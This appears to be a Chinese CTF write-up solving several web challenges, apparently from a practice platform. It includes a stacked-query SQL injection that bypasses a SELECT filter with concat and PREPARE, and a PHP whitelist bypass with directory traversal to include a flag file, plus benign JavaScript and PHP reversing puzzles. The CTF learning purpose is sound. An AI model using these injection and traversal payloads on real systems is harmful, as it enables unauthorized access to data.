supersqli：

（！！！）

1.判斷有誤注入，1'報錯， 1’ 報錯，1’# 正常且為True，1’ and 1=1# 正常且為True，1’ and 1=2# 正常且為False，所以它裡邊存在注入。

2.

inject=1’;show databases;#

3.

inject=1';show tables;#

4.看一下這幾個表
1’;show columns from words;#
1’;show columns from `1919810931114514`;# (字串為表名操作時要加反引號)

5.然後用concat繞過

1';use supersqli;set @sql=concat(‘s’,'elect * from 1919810931114514');PREPARE pre FROM @sql;EXECUTE pre;–+

flag：

flag{c168d583ed0d4d7196967b28cbd0b5e9}

參考：

https://blog.csdn.net/gongjingege/article/details/107576587

ics-06：

1.點選各個按鈕，發現“報表中心”點選後有新頁面，並發現有index.php和id索引，

2.修改id值，發現並沒有其他頁面，嘗試暴力破解，

3.id=2333時長度值不同，測試得到flag，

flag：

 cyberpeace{1fccd89a11e8ee7bc82ee1ccc7288487}

warmup：

1.進入頁面，發現是一張“滑稽”......啊這......開啟控制檯，發現source.php，

2.進入source.php，

3.將source.php改為hint.php，發現並沒有什麼亂用，

4.依然檢視原始碼，最後if的三個判斷條件，

①! empty($_REQUEST['file'])
//要求file變數不為空
②is_string($_REQUEST['file'])
//檢查是否為字串
③emmm::checkFile($_REQUEST['file']
//利用函式進行檢查

5.對函式進行分析，

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

//傳入的引數是source.php或者hint.php都返回true

$_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
//取傳進引數首次出現？前的部分，再進行白名單判斷，如果還不滿足繼續往下判斷

$_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
//將傳進的引數進行urldecode編碼，然後進行上一步判斷，都不滿足就輸出"you can't see it"並且返回假

6.由於是request請求，因此可以利用GET，POST，COOKIE傳參（此處使用GET），

7.構造滿足第二個判斷條件的payload，

http://220.249.52.133:55731/source.php?file=source.php?
http://220.249.52.133:55731/source.php?file=hint.php?

8.構造payload四層目錄，

http://220.249.52.133:55731/source.php?file=source.php?../../../../../ffffllllaaaagggg

9.得到flag，

flag：

 flag{25e7bce6005c4e0c983fb97297ac6e5a} 

補充：

include函式某個功能：以字元‘/’分隔（而且不計個數），若是在前面的字串所代表的檔案無法被PHP找到，則PHP會自動包含‘/’後面的檔案——注意是最後一個‘/’。

include
(PHP 4, PHP 5, PHP 7)
include 語句包含並執行指定檔案。

以下文件也適用於 require。
被包含檔案先按引數給出的路徑尋找，如果沒有給出目錄（只有檔名）時則按照 include_path 指定的目錄尋找。如果在 include_path 下沒找到該檔案則 include 最後才在呼叫指令碼檔案所在的目錄和當前工作目錄下尋找。如果最後仍未找到檔案則 include 結構會發出一條警告；這一點和 require 不同，後者會發出一個致命錯誤。

如果定義了路徑——不管是絕對路徑（在 Windows 下以碟符或者 \ 開頭，在 Unix/Linux 下以 / 開頭）還是當前目錄的相對路徑（以 . 或者 .. 開頭）——include_path 都會被完全忽略。例如一個檔案以 ../ 開頭，則解析器會在當前目錄的父目錄下尋找該檔案。

有關 PHP 怎樣處理包含檔案和包含路徑的更多資訊參見 include_path 部分的文件。

當一個檔案被包含時，其中所包含的程式碼繼承了 include 所在行的變數範圍。從該處開始，呼叫檔案在該行處可用的任何變數在被呼叫的檔案中也都可用。不過所有在包含檔案中定義的函式和類都具有全域性作用域。 

mb_strpos
(PHP 4 >= 4.0.6, PHP 5, PHP 7)

mb_strpos — 查詢字串在另一個字串中首次出現的位置

mb_strpos()：返回要查詢的字串在別一個字串中首次出現的位置

語法：
mb_strpos (haystack ,needle )

引數：
haystack：要被檢查的字串。
needle：要搜尋的字串。

mb_substr() 函式返回字串的一部分，之前我們學過 substr() 函式，它只針對英文字元，如果要分割的中文文字則需要使用 mb_substr()。

註釋：如果 start 引數是負數且 length 小於或等於 start，則 length 為 0。
語法
mb_substr ( string $str , int $start [, int $length = NULL [, string $encoding = mb_internal_encoding() ]] ) : string

引數         描述
str         必需。從該 string 中提取子字串。

start     必需。規定在字串的何處開始。
    正數 - 在字串的指定位置開始
    負數 - 在從字串結尾的指定位置開始
    0 - 在字串中的第一個字元處開始

length    可選。規定要返回的字串長度。預設是直到字串的結尾。
    正數 - 從 start 引數所在的位置返回
    負數 - 從字串末端返回

encoding    可選。字元編碼。如果省略，則使用內部字元編碼。

參考：

https://blog.csdn.net/tch3430493902/article/details/103928125/

https://blog.csdn.net/qq_42016346/article/details/104199710

NaNNaNNaNNaN-Batman：

1.下載附件，用記事本打開發現是亂碼，用winhex開啟，發現是一段hmtl程式碼，

2.將拓展名改為.html並開啟，

3.隨便輸入一段字元，點選“Ok”發現沒有反應，檢視程式碼可以發現，_是一個變數，

因此將末尾的eval()函式改為alert()函式，再次開啟網頁，出現彈窗，並得到可閱讀的程式碼，

4.整理程式碼，

function $()
{
var e=document.getElementById("c").value;
if(e.length==16)
if(e.match(/^be0f23/)!=null)
if(e.match(/233ac/)!=null)
if(e.match(/e98aa$/)!=null)
if(e.match(/c7be9/)!=null)
    {   var t=["fl","s_a","i","e}"];
        var n=["a","_h0l","n"];
        var r=["g{","e","_0"];
        var i=["it'","_","n"];
        var s=[t,n,r,i];
    for(var o=0;o<13;++o)
        {
         document.write(s[o%4][0]);
         s[o%4].splice(0,1)
        }
    }
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _

5.根據程式碼中if的條件，依次滿足：長度為16，be0f23開頭，e98aa結尾，包含233ac，包含c7be9，則：

be0f233ac7be98aa

注意：正則表示式，^為開始符，$為結束符

6.將之前修改的alert()函式改回eval()函式，開啟該html檔案，輸入5中的字串，

7.另外，還可以在控制檯直接複製以下程式碼，

var t=["fl","s_a","i","e}"];
        var n=["a","_h0l","n"];
        var r=["g{","e","_0"];
        var i=["it'","_","n"];
        var s=[t,n,r,i];
    for(var o=0;o<13;++o)
        {
         document.write(s[o%4][0]);
         s[o%4].splice(0,1)
        }

flag：

flag{it's_a_h0le_in_0ne}

具體參考：

https://www.cnblogs.com/meibumei/p/12876150.html

web2：

1.進入頁面，是一段程式碼，而且思路已給出，

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);
　　//
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    return str_rot13(strrev(base64_encode($_)));
}
highlight_file(__FILE__);
/*
   逆向加密演算法，解密$miwen就是flag
*/
?> 

2.編寫逆向程式碼，

<?php
$str='a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws';
$_ = base64_decode(strrev(str_rot13($str)));
$_o=NULL;
for($_0=0;$_0<strlen($_);$_0++){  
       
        $_c=substr($_,$_0,1);  

        $__=ord($_c)-1;  

        $_c=chr($__);  

        $_o=$_o.$_c;   
    } 
echo strrev($_o);
?>

3.得到flag，

flag：

flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

參考：
https://blog.csdn.net/weixin_42499640/article/details/99102049